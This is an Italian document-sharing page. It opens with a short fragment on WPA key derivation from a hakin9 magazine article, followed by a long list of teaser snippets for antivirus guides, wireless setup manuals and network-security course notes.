(Temporary MIC Key 2x64 bit): Chiave per l'autenticazione Handshake a quattro vie per la derivazione della PTK (Pairwise Transient Key) e della GTK (Group Transient Key), Group Key Handshake per il rinnovo della GTK. La derivazione della PMK (Pairwise Master Key) dipende dal metodo di autenticazione usato: se viene usata una PSK (Pre- Shared Key), PMK = PSK. La Fig. 6: Fase 2: Autenticazione 802.1X 20 hakin9 Nº 2/2006

Networking Wireless con Windows XP

Networking Wireless con Windows XP Networking Wireless con Windows XP Creare una rete wireless AD HOC Clic destro su Risorse del computer e quindi su Proprietà Clic sulla scheda Nome computer e quindi sul pulsante Cambia Digitare il nome

Dettagli

Connessioni sicure: ma quanto lo sono?

Connessioni sicure: ma quanto lo sono? Connessioni sicure: ma quanto lo sono? Vitaly Denisov Contenuti Cosa sono le connessioni sicure?...2 Diversi tipi di protezione contro i pericoli del network.....4 Il pericolo delle connessioni sicure

Dettagli

Internet Security 2012

Internet Security 2012 Internet Security 2012 Guida introduttiva Importante Sulla custodia del CD sarà possibile trovare il codice di attivazione con il quale attivare il prodotto. Si consiglia di conservarlo in un luogo sicuro.

Dettagli

ESET SMART SECURITY 6

ESET SMART SECURITY 6 ESET SMART SECURITY 6 Microsoft Windows 8 / 7 / Vista / XP / Home Server Guida di avvio rapido Fare clic qui per scaricare la versione più recente di questo documento ESET Smart Security offre una protezione

Dettagli

LA SICUREZZA INFORMATICA SU INTERNET LE MINACCE

LA SICUREZZA INFORMATICA SU INTERNET LE MINACCE LE MINACCE I rischi della rete (virus, spyware, adware, keylogger, rootkit, phishing, spam) Gli attacchi per mezzo di software non aggiornato La tracciabilità dell indirizzo IP pubblico. 1 LE MINACCE I

Dettagli

ESET SMART SECURITY 8

ESET SMART SECURITY 8 ESET SMART SECURITY 8 Microsoft Windows 8.1 / 8 / 7 / Vista / XP / Home Server 2003 / Home Server 2011 Guida di avvio rapido Fare clic qui per scaricare la versione più recente di questo documento ESET

Dettagli

ESET SMART SECURITY 9

ESET SMART SECURITY 9 ESET SMART SECURITY 9 Microsoft Windows 10 / 8.1 / 8 / 7 / Vista / XP Guida di avvio rapido Fare clic qui per scaricare la versione più recente di questo documento ESET Smart Security è un software di

Dettagli

DIFENDIAMO LA NOSTRA WLAN

DIFENDIAMO LA NOSTRA WLAN DIFENDIAMO LA NOSTRA WLAN Scritto da Matteo Giardino Le WLAN (Wireless Local Area Network) sono tutte quelle reti dove gli hosts (ovvero i computer che fanno parte della rete) sono collegati fra di loro

Dettagli

Implicazioni sociali dell informatica

Implicazioni sociali dell informatica Fluency Implicazioni sociali dell informatica Capitolo 10 Privacy I nostri corpi I nostri luoghi Le informazioni Le comunicazioni personali La privacy Con i moderni dispositivi è possibile violare la privacy

Dettagli

ESET SMART SECURITY 7

ESET SMART SECURITY 7 ESET SMART SECURITY 7 Microsoft Windows 8.1 / 8 / 7 / Vista / XP / Home Server 2003 / Home Server 2011 Guida di avvio rapido Fare clic qui per scaricare la versione più recente di questo documento ESET

Dettagli

Rete Wireless del Comune di Padova

Rete Wireless del Comune di Padova Ricorda che per qualsiasi chiarimento gli operatori dell'informagiovani sono a tua disposizione nei seguenti orari: martedì e mercoledì dalle 10.00 alle 13.00 e dalle 15.00 alle 18.00 giovedì dalle 15.00

Dettagli

Proteggi ciò che crei. Guida all avvio rapido

Proteggi ciò che crei. Guida all avvio rapido Proteggi ciò che crei Guida all avvio rapido 1 Documento aggiornato il 10.06.2013 Tramite Dr.Web CureNet! si possono eseguire scansioni antivirali centralizzate di una rete locale senza installare il programma

Dettagli

Benvenuti alla Guida introduttiva - Sicurezza

Benvenuti alla Guida introduttiva - Sicurezza Benvenuti alla Guida introduttiva - Sicurezza Table of Contents Benvenuti alla Guida introduttiva - Sicurezza... 1 PC Tools Internet Security... 3 Guida introduttiva a PC Tools Internet Security... 3

Dettagli

IT Security 3 LA SICUREZZA IN RETE

IT Security 3 LA SICUREZZA IN RETE 1 IT Security 3 LA SICUREZZA IN RETE Una RETE INFORMATICA è costituita da un insieme di computer collegati tra di loro e in grado di condividere sia le risorse hardware (stampanti, Hard Disk,..), che le

Dettagli

Guida in linea di Symantec pcanywhere Web Remote

Guida in linea di Symantec pcanywhere Web Remote Guida in linea di Symantec pcanywhere Web Remote Connessione da un browser Web Il documento contiene i seguenti argomenti: Informazioni su Symantec pcanywhere Web Remote Metodi per la protezione della

Dettagli

NetCrunch 6. Server per il controllo della rete aziendale. Controlla

NetCrunch 6. Server per il controllo della rete aziendale. Controlla AdRem NetCrunch 6 Server per il controllo della rete aziendale Con NetCrunch puoi tenere sotto controllo ogni applicazione, servizio, server e apparato critico della tua azienda. Documenta Esplora la topologia

Dettagli

Introduzione a Windows XP Professional Installazione di Windows XP Professional Configurazione e gestione di account utente

Introduzione a Windows XP Professional Installazione di Windows XP Professional Configurazione e gestione di account utente Programma Introduzione a Windows XP Professional Esplorazione delle nuove funzionalità e dei miglioramenti Risoluzione dei problemi mediante Guida in linea e supporto tecnico Gruppi di lavoro e domini

Dettagli

Antivirus Pro 2012. Guida introduttiva

Antivirus Pro 2012. Guida introduttiva Antivirus Pro 2012 Guida introduttiva Importante Sulla custodia del CD sarà possibile trovare il codice di attivazione con il quale attivare il prodotto. Si consiglia di conservarlo in un luogo sicuro.

Dettagli

ESET NOD32 Antivirus 4 per Linux Desktop. Guida all'avvio rapido

ESET NOD32 Antivirus 4 per Linux Desktop. Guida all'avvio rapido ESET NOD32 Antivirus 4 per Linux Desktop Guida all'avvio rapido ESET NOD32 Antivirus 4 fornisce una protezione all'avanguardia per il computer contro codici dannosi. Basato sul motore di scansione ThreatSense

Dettagli

RIPETITORE WIRELESS N 300MBPS

RIPETITORE WIRELESS N 300MBPS RIPETITORE WIRELESS N 300MBPS Guida rapida all'installazione DN-70181 Introduzione: DN-70181 e un ripetitore Wi-Fi con una combinazione dispositivo di connessione di rete cablato/wireless progettato specificamente

Dettagli

Introduzione a Internet e cenni di sicurezza. Dott. Paolo Righetto 1

Introduzione a Internet e cenni di sicurezza. Dott. Paolo Righetto 1 Introduzione a Internet e cenni di sicurezza Dott. Paolo Righetto 1 Introduzione a Internet e cenni di sicurezza Quadro generale: Internet Services Provider (ISP) Server WEB World Wide Web Rete ad alta

Dettagli

SIEMENS GIGASET SX763 GUIDA ALL INSTALLAZIONE

SIEMENS GIGASET SX763 GUIDA ALL INSTALLAZIONE SIEMENS GIGASET SX763 GUIDA ALL INSTALLAZIONE Siemens Gigaset SX763 Guida all installazione EUTELIAVOIP Rev1-0 pag.2 INDICE COSA E IL SIEMENS SX763...3 IL CONTENUTO DELLA SCATOLA DEL SIEMENS SX763...4

Dettagli

Istruzioni per l uso. (Per l installazione Panasonic Document Management System) Digital Imaging Systems. Installazione. Sommario.

Istruzioni per l uso. (Per l installazione Panasonic Document Management System) Digital Imaging Systems. Installazione. Sommario. Istruzioni per l uso (Per l installazione Panasonic Document Management System) Digital Imaging Systems N. modello DP-800E / 800P / 806P Installazione Sommario Installazione Installazione del driver di

Dettagli

Windows Live OneCare Introduzione e installazione

Windows Live OneCare Introduzione e installazione Windows Live OneCare Introduzione e installazione La sicurezza e la manutenzione del proprio computer è di fondamentale importanza per tenerlo sempre efficiente e al riparo dalle minacce provenienti dalla

Dettagli

M ODULO 7 - SYLLABUS 1.0. IT Security. Corso NUOVA ECDL 2015 prof. A. Costa

M ODULO 7 - SYLLABUS 1.0. IT Security. Corso NUOVA ECDL 2015 prof. A. Costa M ODULO 7 - SYLLABUS 1.0 IT Security Corso NUOVA ECDL 2015 prof. A. Costa Minacce ai dati 1 Concetti di sicurezza Differenze fra dati e informazioni Il termine crimine informatico: intercettazione, interferenza,

Dettagli

per Mac Guida all'avvio rapido

per Mac Guida all'avvio rapido per Mac Guida all'avvio rapido ESET Cybersecurity fornisce una protezione all'avanguardia per il computer contro codici dannosi. Basato sul motore di scansione ThreatSense introdotto per la prima volta

Dettagli

Progettazione di reti AirPort

Progettazione di reti AirPort apple Progettazione di reti AirPort Indice 1 Per iniziare con AirPort 5 Utilizzo di questo documento 5 Impostazione Assistita AirPort 6 Caratteristiche di AirPort Admin Utility 6 2 Creazione di reti AirPort

Dettagli

Aggiunte alla documentazione

Aggiunte alla documentazione Aggiunte alla documentazione Software di sicurezza Zone Alarm versione 7.1 Nel presente documento vengono trattate le nuove funzionalità non incluse nelle versioni localizzate del manuale utente. Fare

Dettagli

Guida introduttiva Antivirus Pro 2009 Importante Leggere attentamente la sezione Attivazione del prodotto della presente guida. Le informazioni contenute in questa sezione sono fondamentali per garantire

Dettagli

Dove installare GFI EventsManager sulla rete?

Dove installare GFI EventsManager sulla rete? Installazione Introduzione Dove installare GFI EventsManager sulla rete? GFI EventsManager può essere installato su qualsiasi computer che soddisfi i requisiti minimi di sistema, indipendentemente dalla

Dettagli

Le reti Sicurezza in rete

Le reti Sicurezza in rete Le reti Sicurezza in rete Tipi di reti Con il termine rete si intende un insieme di componenti, sistemi o entità interconnessi tra loro. Nell ambito dell informatica, una rete è un complesso sistema di

Dettagli

Symantec Network Access Control Guida introduttiva

Symantec Network Access Control Guida introduttiva Symantec Network Access Control Guida introduttiva Symantec Network Access Control Guida introduttiva Il software descritto nel presente manuale viene fornito in conformità a un contratto di licenza e

Dettagli

KASPERSKY FRAUD PREVENTION FOR ENDPOINTS

KASPERSKY FRAUD PREVENTION FOR ENDPOINTS KASPERSKY FRAUD PREVENTION FOR ENDPOINTS www.kaspersky.com KASPERSKY FRAUD PREVENTION 1. Modi di attacco ai servizi bancari online Il motivo principale alla base del cybercrimine è quello di ottenere denaro

Dettagli

Università Degli Studi dell Insubria. Centro Sistemi Informativi e Comunicazione (SIC) Rete Wireless di Ateneo UninsubriaWireless

Università Degli Studi dell Insubria. Centro Sistemi Informativi e Comunicazione (SIC) Rete Wireless di Ateneo UninsubriaWireless Università Degli Studi dell Insubria Centro Sistemi Informativi e Comunicazione (SIC) Rete Wireless di Ateneo UninsubriaWireless Istruzioni per l accesso alla rete WiFi INSUBRIA CAMPUS STUDENTI Configurazione

Dettagli

Glossario ADSL Asymmetric Digital Subscriber Line ADSL2+ Asymmetric Digital Subscriber Line ADSL ADSL2+ Browser Un browser Client Un client

Glossario ADSL Asymmetric Digital Subscriber Line ADSL2+ Asymmetric Digital Subscriber Line ADSL ADSL2+ Browser Un browser Client Un client Glossario ADSL Asymmetric Digital Subscriber Line ADSL2+ Asymmetric Digital Subscriber Line ADSL è una tecnica di trasmissione dati che permette l accesso a Internet fino a 8 Mbps in downstream ed 1 Mbps

Dettagli

ESET NOD32 ANTIVIRUS 6

ESET NOD32 ANTIVIRUS 6 ESET NOD32 ANTIVIRUS 6 Microsoft Windows 8 / 7 / Vista / XP / Home Server Guida di avvio rapido Fare clic qui per scaricare la versione più recente di questo documento ESET NOD32 Antivirus offre una protezione

Dettagli

ROUTER WIRELESS A BANDA LARGA 11N 300MBPS

ROUTER WIRELESS A BANDA LARGA 11N 300MBPS ROUTER WIRELESS A BANDA LARGA 11N 300MBPS Guida all'installazione rapida DN-70591 INTRODUZIONE DN-70591 è un dispositivo combinato wireless/cablato progettato in modo specifico per i requisiti di rete

Dettagli

Junos Pulse per BlackBerry

Junos Pulse per BlackBerry Junos Pulse per BlackBerry Guida utente Versione 4.0 Giugno 2012 R1 Copyright 2012, Juniper Networks, Inc. Juniper Networks, Junos, Steel-Belted Radius, NetScreen e ScreenOS sono marchi registrati di Juniper

Dettagli

Windows SteadyState?

Windows SteadyState? Domande tecniche frequenti relative a Windows SteadyState Domande di carattere generale È possibile installare Windows SteadyState su un computer a 64 bit? Windows SteadyState è stato progettato per funzionare

Dettagli

Sicurezza nelle applicazioni multimediali: lezione 8, sicurezza ai livelli di rete e data-link. Sicurezza ai livelli di rete e data link

Sicurezza nelle applicazioni multimediali: lezione 8, sicurezza ai livelli di rete e data-link. Sicurezza ai livelli di rete e data link Sicurezza ai livelli di rete e data link Sicurezza a livello applicativo Ma l utilizzo di meccanismi di cifratura e autenticazione può essere introdotto anche ai livelli inferiori dello stack 2 Sicurezza

Dettagli

F-Secure Anti-Virus for Mac 2015

F-Secure Anti-Virus for Mac 2015 F-Secure Anti-Virus for Mac 2015 2 Sommario F-Secure Anti-Virus for Mac 2015 Sommario Capitolo 1: Operazioni preliminari...3 1.1 Gestione abbonamento...4 1.2 Come verificare che il computer sia protetto...4

Dettagli

Server USB Manuale dell'utente

Server USB Manuale dell'utente Server USB Manuale dell'utente - 1 - Copyright 2010Informazioni sul copyright Copyright 2010. Tutti i diritti riservati. Disclaimer Incorporated non è responsabile per errori tecnici o editoriali od omissioni

Dettagli

Indice generale. Introduzione...xiii. Nota del revisore...xvii. Introduzione alle reti...1. Introduzione alle reti wireless...11

Indice generale. Introduzione...xiii. Nota del revisore...xvii. Introduzione alle reti...1. Introduzione alle reti wireless...11 Introduzione...xiii Nota del revisore...xvii Capitolo 1 Capitolo 2 Introduzione alle reti...1 Trasferimento di dati... 2 Bit e byte... 2 Controllo di errore... 3 Handshaking... 3 Trovare la destinazione...

Dettagli

Università Degli Studi dell Insubria Centro Sistemi Informativi e Comunicazione (SIC) Rete Wireless di Ateneo UninsubriaWireless

Università Degli Studi dell Insubria Centro Sistemi Informativi e Comunicazione (SIC) Rete Wireless di Ateneo UninsubriaWireless Università Degli Studi dell Insubria Centro Sistemi Informativi e Comunicazione (SIC) Rete Wireless di Ateneo UninsubriaWireless Istruzioni per l accesso alle reti WiFi dotate di WEB captive portal INSURIA-ATENO,

Dettagli

KASPERSKY SECURITY FOR BUSINESS

KASPERSKY SECURITY FOR BUSINESS SECURITY FOR BUSINESS Le nostre tecnologie perfettamente interoperabili Core Select Advanced Total Gestita tramite Security Center Disponibile in una soluzione mirata Firewall Controllo Controllo Dispositivi

Dettagli

Istruzioni per l'uso - Guida alla configurazione

Istruzioni per l'uso - Guida alla configurazione RICOH TotalFlow Prep Istruzioni per l'uso - Guida alla configurazione Prima della configurazione Installazione Version 3.0 Avvio/Chiusura Per le informazioni non presenti in questo manuale, fare riferimento

Dettagli

GFI LANguard 9. Guida introduttiva. A cura di GFI Software Ltd.

GFI LANguard 9. Guida introduttiva. A cura di GFI Software Ltd. GFI LANguard 9 Guida introduttiva A cura di GFI Software Ltd. http://www.gfi.com E-mail: info@gfi.com Le informazioni contenute nel presente documento sono soggette a modifiche senza preavviso. Salvo se

Dettagli

Guida introduttiva Internet Security 2009 Importante Leggere attentamente la sezione Attivazione del prodotto della presente guida. Le informazioni contenute in questa sezione sono fondamentali per garantire

Dettagli

Guida pratica all uso di AVG Free 8.0 Adolfo Catelli

Guida pratica all uso di AVG Free 8.0 Adolfo Catelli Guida pratica all uso di AVG Free 8.0 Adolfo Catelli Introduzione AVG Free è sicuramente uno degli antivirus gratuiti più conosciuti e diffusi: infatti, secondo i dati del produttore Grisoft, questo software

Dettagli

Symantec Backup Exec 12.5 for Windows Servers. Guida rapida all'installazione

Symantec Backup Exec 12.5 for Windows Servers. Guida rapida all'installazione Symantec Backup Exec 12.5 for Windows Servers Guida rapida all'installazione 13897290 Installazione di Backup Exec Il documento contiene i seguenti argomenti: Requisiti di sistema Prima dell'installazione

Dettagli

1) Reti di calcolatori. Una rete locale di computer (Local Area Network) è costituita da computer collegati tramite cavi di

1) Reti di calcolatori. Una rete locale di computer (Local Area Network) è costituita da computer collegati tramite cavi di 1) Reti di calcolatori 2) Internet 3) Sicurezza LAN 1) Reti di calcolatori Una rete locale di computer (Local Area Network) è costituita da computer collegati tramite cavi di rete (cavi UTP) o con tecnologia

Dettagli

Il tuo manuale d'uso. LAPLINK EVERYWHERE 4 http://it.yourpdfguides.com/dref/2943205

Il tuo manuale d'uso. LAPLINK EVERYWHERE 4 http://it.yourpdfguides.com/dref/2943205 Può anche leggere le raccomandazioni fatte nel manuale d uso, nel manuale tecnico o nella guida di installazione di LAPLINK EVERYWHERE 4. Troverà le risposte a tutte sue domande sul manuale d'uso (informazioni,

Dettagli

www.avg.it Come navigare senza rischi

www.avg.it Come navigare senza rischi Come navigare senza rischi 01 02 03 04 05 06.Introduzione 01.Naviga in Sicurezza 02.Social Network 08.Cosa fare in caso di...? 22.Supporto AVG 25.Link e riferimenti 26 [02] 1.introduzione l obiettivo di

Dettagli

Importante! Leggere attentamente la sezione Attivazione dei servizi della presente guida. Le informazioni contenute in questa sezione sono fondamentali per garantire la protezione del PC. MEGA DETECTION

Dettagli

Informativa per trattamento di dati personali Documento informativo ai sensi e per gli effetti di cui all articolo 13, D.Lgs. 30 giugno 2003 n.

Informativa per trattamento di dati personali Documento informativo ai sensi e per gli effetti di cui all articolo 13, D.Lgs. 30 giugno 2003 n. PRIVACY POLICY Informativa per trattamento di dati personali Documento informativo ai sensi e per gli effetti di cui all articolo 13, D.Lgs. 30 giugno 2003 n. 196 In osservanza al D.Lgs. 30 giugno 2003

Dettagli

Internet gratuita in Biblioteca e nei dintorni

Internet gratuita in Biblioteca e nei dintorni Internet gratuita in Biblioteca e nei dintorni Per la navigazione è necessaria l iscrizione preventiva in Biblioteca, sia al Servizio Bibliotecario sia a quello internet Per poter accedere a Internet tramite

Dettagli

Indice I rischi: introduzione alle reti connesse a Internet Le reti e il protocollo TCP/IP

Indice I rischi: introduzione alle reti connesse a Internet Le reti e il protocollo TCP/IP Indice Capitolo 1 I rischi: introduzione alle reti connesse a Internet 1 1.1 Il virus Worm 3 1.2 Lo stato della rete nel 2002 9 1.3 Cos è Internet 10 1.4 La commutazione di pacchetti: la base della maggior

Dettagli

Guida d installazione rapida

Guida d installazione rapida V38.01 IP Camera senza fili/cablata Guida d installazione rapida (Per MAC OS) FI8909/FI8909W ShenZhen Foscam Tecnologia Intelligente Co., Ltd Guida d installazione rapida Lista d imballaggio 1) IP CAMERA

Dettagli

Guida di rete. Configurazione di Windows Utilizzo di un server di stampa Monitoraggio e configurazione della stampante Appendice

Guida di rete. Configurazione di Windows Utilizzo di un server di stampa Monitoraggio e configurazione della stampante Appendice Guida di rete 1 2 3 4 Configurazione di Windows Utilizzo di un server di stampa Monitoraggio e configurazione della stampante Appendice Si prega di leggere attentamente questo manuale prima di utilizzare

Dettagli

Sygate 5.5 Freeware : Guida all'uso

Sygate 5.5 Freeware : Guida all'uso Sygate 5.5 Freeware : Guida all'uso Per l'utente medio esistono molte scelte in tema di firewall e Sygate 5.5 free è un programma da prendere in seria considerazione perché è semplice da utilizzare e una

Dettagli

Xerox. Print Advisor Domande frequenti

Xerox. Print Advisor Domande frequenti Print Advisor Generali D. Che cos'è Print Advisor? R. Print Advisor è uno strumento software che tutti i clienti ColorQube 9200 possono scaricare e installare. I vantaggi principali di Print Advisor sono:

Dettagli

Manuale d uso. rev. 270406

Manuale d uso. rev. 270406 Manuale d uso istudio rev. 270406 1 Indice Capitolo 1: istudio il convertitore di film e musica per ipod Capitolo 2: Primi passi Come fare per...5 Installazione...5 Capitolo 3: Usare istudio Impostazioni...7

Dettagli

Come si può notare ogni richiesta ICMP Echo Request va in timeout in

Come si può notare ogni richiesta ICMP Echo Request va in timeout in Comandi di rete Utility per la verifica del corretto funzionamento della rete: ICMP Nelle procedure viste nei paragrafi precedenti si fa riferimento ad alcuni comandi, come ping e telnet, per potere verificare

Dettagli

Perché abbiamo problemi di sicurezza? Sicurezza nel computer dell utente. Sicurezza. Sicurezza. Nota di Copyright

Perché abbiamo problemi di sicurezza? Sicurezza nel computer dell utente. Sicurezza. Sicurezza. Nota di Copyright SICUREZZA INFORMATICA RETI DI CALCOLATORI II Introduzione Prof. PIER LUCA MONTESSORO Facoltà di Ingegneria Università degli Studi di Udine Nota di Copyright Questo insieme di trasparenze (detto nel seguito

Dettagli

ESET CYBER SECURITY per Mac Guida all avvio rapido. Fare clic qui per scaricare la versione più recente di questo documento

ESET CYBER SECURITY per Mac Guida all avvio rapido. Fare clic qui per scaricare la versione più recente di questo documento ESET CYBER SECURITY per Mac Guida all avvio rapido Fare clic qui per scaricare la versione più recente di questo documento ESET Cyber Security fornisce una protezione del computer all'avanguardia contro

Dettagli

Guida di Active System Console

Guida di Active System Console Guida di Active System Console Panoramica... 1 Installazione... 2 Visualizzazione delle informazioni di sistema... 4 Soglie di monitoraggio del sistema... 5 Impostazioni di notifica tramite e-mail... 5

Dettagli

Il servizio Wireless permette ai Clienti FASTWEB di sfruttare al meglio la connessione a banda larga di FASTWEB evitando di cablare fisicamente l

Il servizio Wireless permette ai Clienti FASTWEB di sfruttare al meglio la connessione a banda larga di FASTWEB evitando di cablare fisicamente l Manuale WI-FI Il servizio Wireless permette ai Clienti FASTWEB di sfruttare al meglio la connessione a banda larga di FASTWEB evitando di cablare fisicamente l ambiente. Indice Introduzione 6 Controlla

Dettagli

hottimo procedura di installazione

hottimo procedura di installazione hottimo procedura di installazione LATO SERVER Per un corretto funzionamento di hottimo è necessario in primis installare all interno del server, Microsoft Sql Server 2008 (Versione minima Express Edition)

Dettagli

Xerox EX8002 Print Server, Powered by Fiery. Guida introduttiva

Xerox EX8002 Print Server, Powered by Fiery. Guida introduttiva Xerox EX8002 Print Server, Powered by Fiery Guida introduttiva 2009 Electronics for Imaging, Inc. Per questo prodotto, il trattamento delle informazioni contenute nella presente pubblicazione è regolato

Dettagli

Guida all'amministrazione. BlackBerry Professional Software per Microsoft Exchange. Versione: 4.1 Service Pack: 4

Guida all'amministrazione. BlackBerry Professional Software per Microsoft Exchange. Versione: 4.1 Service Pack: 4 BlackBerry Professional Software per Microsoft Exchange Versione: 4.1 Service Pack: 4 SWD-313211-0911044452-004 Indice 1 Gestione degli account utente... 7 Aggiunta di un account utente... 7 Aggiunta manuale

Dettagli

Il browser Microsoft Edge

Il browser Microsoft Edge Il browser Microsoft Edge Il nuovo browser della Microsoft, rilasciato con la versione Windows 10, è Microsoft Edge. Esso sembra offrire nuovi modi per trovare contenuti, leggere e scrivere sul Web. Per

Dettagli

IP Camera senza fili/cablata. Guida d installazione rapida (Per Windows OS) ShenZhen Foscam Tecnologia Intelligente Co., Ltd

IP Camera senza fili/cablata. Guida d installazione rapida (Per Windows OS) ShenZhen Foscam Tecnologia Intelligente Co., Ltd IP Camera senza fili/cablata Guida d installazione rapida (Per Windows OS) Modello: FI8910W Colore: Nera Modello: FI8910W Colore: Bianco ShenZhen Foscam Tecnologia Intelligente Co., Ltd Guida d installazione

Dettagli

Comandi di Rete. Principali Comandi di Rete. Verificare, testare ed analizzare da Riga di Comando

Comandi di Rete. Principali Comandi di Rete. Verificare, testare ed analizzare da Riga di Comando Comandi di Rete Principali Comandi di Rete. Verificare, testare ed analizzare da Riga di Comando PING: verifica la comunicazione tra due pc Il comando ping consente di verificare la connettività a livello

Dettagli

Consulenza Informatica ======================================================================= Introduzione. Documentazione tecnica

Consulenza Informatica ======================================================================= Introduzione. Documentazione tecnica Introduzione Le novità che sono state introdotte nei terminal services di Windows Server 2008 sono davvero tante ed interessanti, sotto tutti i punti di vista. Chi già utilizza i Terminal Services di Windows

Dettagli

VADEMECUM TECNICO. Per PC con sistema operativo Windows XP Windows Vista - Windows 7

VADEMECUM TECNICO. Per PC con sistema operativo Windows XP Windows Vista - Windows 7 VADEMECUM TECNICO Per PC con sistema operativo Windows XP Windows Vista - Windows 7 1) per poter operare in Server Farm bisogna installare dal cd predisposizione ambiente server farm i due file: setup.exe

Dettagli

SICUREZZA INFORMATICA RETI DI CALCOLATORI II. Introduzione

SICUREZZA INFORMATICA RETI DI CALCOLATORI II. Introduzione SICUREZZA INFORMATICA RETI DI CALCOLATORI II Introduzione Prof. PIER LUCA MONTESSORO Facoltà di Ingegneria Università degli Studi di Udine 1 Nota di Copyright Questo insieme di trasparenze (detto nel seguito

Dettagli

Capitolo 1: Operazioni preliminari...3

Capitolo 1: Operazioni preliminari...3 F-Secure Anti-Virus for Mac 2014 Sommario 2 Sommario Capitolo 1: Operazioni preliminari...3 1.1 Operazioni da effettuare in seguito all'installazione...4 1.1.1 Gestione abbonamento...4 1.1.2 Come aprire

Dettagli

SICUREZZA. Sistemi Operativi. Sicurezza

SICUREZZA. Sistemi Operativi. Sicurezza SICUREZZA 14.1 Sicurezza Il Problema della Sicurezza Convalida Pericoli per i Programmi Pericoli per il Sistema Difendere i Sistemi Scoperta di Intrusioni Cifratura Esempio: Windows NT 14.2 Il Problema

Dettagli

Sistemi Operativi SICUREZZA. Sistemi Operativi. D. Talia - UNICAL 14.1

Sistemi Operativi SICUREZZA. Sistemi Operativi. D. Talia - UNICAL 14.1 SICUREZZA 14.1 Sicurezza Il Problema della Sicurezza Convalida Pericoli per i Programmi Pericoli per il Sistema Difendere i Sistemi Scoperta di Intrusioni Cifratura Esempio: Windows NT 14.2 Il Problema

Dettagli

Talento LAB 4.1 - UTILIZZARE FTP (FILE TRANSFER PROTOCOL) L'UTILIZZO DI ALTRI SERVIZI INTERNET. In questa lezione imparerete a:

Talento LAB 4.1 - UTILIZZARE FTP (FILE TRANSFER PROTOCOL) L'UTILIZZO DI ALTRI SERVIZI INTERNET. In questa lezione imparerete a: Lab 4.1 Utilizzare FTP (File Tranfer Protocol) LAB 4.1 - UTILIZZARE FTP (FILE TRANSFER PROTOCOL) In questa lezione imparerete a: Utilizzare altri servizi Internet, Collegarsi al servizio Telnet, Accedere

Dettagli

Connessioni e protocollo Internet (TCP/IP)

Connessioni e protocollo Internet (TCP/IP) "Panoramica dell'installazione e della configurazione della rete" a pagina 3-2 "Scelta di un metodo di connessione" a pagina 3-3 "Connessione Ethernet (consigliata)" a pagina 3-3 "Connessione USB" a pagina

Dettagli

Come creare una rete domestica con Windows XP

Come creare una rete domestica con Windows XP Lunedì 13 Aprile 2009 - ore: 12:49 Pagina Reti www.google.it www.virgilio.it www.tim.it www.omnitel.it Come creare una rete domestica con Windows XP Introduzione Una rete locale (LAN,

Dettagli

Connessioni e indirizzo IP

Connessioni e indirizzo IP Connessioni e indirizzo IP Questo argomento include le seguenti sezioni: "Installazione della stampante" a pagina 3-2 "Impostazione della connessione" a pagina 3-6 Installazione della stampante Le informazioni

Dettagli

Gestione del database Gidas

Gestione del database Gidas Gestione del database Gidas Manuale utente Aggiornamento 20/06/2013 Cod. SWUM_00535_it Sommario 1. Introduzione... 3 2. Requisiti e creazione del Database Gidas... 3 2.1.1. SQL Server... 3 2.1.2. Requisiti

Dettagli

Sophos Endpoint Security and Control Guida di avvio per computer autonomi

Sophos Endpoint Security and Control Guida di avvio per computer autonomi Sophos Endpoint Security and Control Guida di avvio per computer autonomi Sophos Endpoint Security and Control versione 9 Sophos Anti-Virus per Mac OS X, versione 7 Data documento: ottobre 2009 Sommario

Dettagli

La Sicurezza delle Reti. La Sicurezza delle Reti. Il software delle reti. Sistemi e tecnologie per la multimedialità e telematica.

La Sicurezza delle Reti. La Sicurezza delle Reti. Il software delle reti. Sistemi e tecnologie per la multimedialità e telematica. Sistemi e tecnologie per la multimedialità e telematica Fabio Burroni Dipartimento di Ingegneria dell Informazione Università degli Studi di Siena burronif@unisi unisi.itit La Sicurezza delle Reti La presentazione

Dettagli

IP Camera senza fili/cablata. Guida d installazione rapida (Per MAC OS) ShenZhen Foscam Tecnologia Intelligente Co., Ltd

IP Camera senza fili/cablata. Guida d installazione rapida (Per MAC OS) ShenZhen Foscam Tecnologia Intelligente Co., Ltd IP Camera senza fili/cablata Guida d installazione rapida (Per MAC OS) Modello: FI8910W Colore: Nera Modello: FI8910W Colore: Bianco ShenZhen Foscam Tecnologia Intelligente Co., Ltd Guida d installazione

Dettagli

Guida all'installazione

Guida all'installazione Istruzioni per l'uso Guida all'installazione 1 Prima dell'installazione 2 Installazione 3 Avvio/Chiusura Si raccomanda di leggere con attenzione il presente manuale prima di utilizzare il prodotto e di

Dettagli

McAfee PC Protection Plus - Guida rapida

McAfee PC Protection Plus - Guida rapida Protezione del computer e dei file più importanti McAfee PC Protection Plus blocca virus, spyware e hacker ed esegue anche il backup e il ripristino di video, musica e file importanti. Include anche strumenti

Dettagli

Importante! Leggere attentamente la sezione Attivazione dei servizi della presente guida. Le informazioni contenute in questa sezione sono fondamentali per garantire la protezione del PC. MEGA DETECTION

Dettagli

Guida introduttiva di F-Secure PSB

Guida introduttiva di F-Secure PSB Guida introduttiva di F-Secure PSB Guida introduttiva di F-Secure PSB Indice generale 3 Sommario Capitolo 1: Introduzione...5 Capitolo 2: Guida introduttiva...7 Creazione di un nuovo account...8 Come

Dettagli

Università Degli Studi dell Insubria. Centro Sistemi Informativi e Comunicazione (SIC) Rete Wireless di Ateneo UninsubriaWireless

Università Degli Studi dell Insubria. Centro Sistemi Informativi e Comunicazione (SIC) Rete Wireless di Ateneo UninsubriaWireless Università Degli Studi dell Insubria Centro Sistemi Informativi e Comunicazione (SIC) Rete Wireless di Ateneo UninsubriaWireless Istruzioni per l accesso alla rete WiFi INSUBRIA-CAMPUS-STUDENTI Configurazione

Dettagli

Windows Vista, il nuovo sistema operativo Microsoft che cerca le giuste risposte ai quesiti di sicurezza

Windows Vista, il nuovo sistema operativo Microsoft che cerca le giuste risposte ai quesiti di sicurezza Windows Vista, il nuovo sistema operativo Microsoft che cerca le giuste risposte ai quesiti di sicurezza Microsoft Windows è il sistema operativo più diffuso, ma paradossalmente è anche quello meno sicuro.

Dettagli

GFI Product Manual. ReportPack

GFI Product Manual. ReportPack GFI Product Manual ReportPack http://www.gfi.com info@gfi.com Le informazioni contenute nel presente documento sono soggette a modifiche senza preavviso. Salvo se indicato diversamente, le società, i nomi

Dettagli

ESET NOD32 ANTIVIRUS 7

ESET NOD32 ANTIVIRUS 7 ESET NOD32 ANTIVIRUS 7 Microsoft Windows 8.1 / 8 / 7 / Vista / XP / Home Server 2003 / Home Server 2011 Guida di avvio rapido Fare clic qui per scaricare la versione più recente di questo documento ESET

Dettagli

www.siliceo.es WiFi-Repeater Manuale di istruzioni

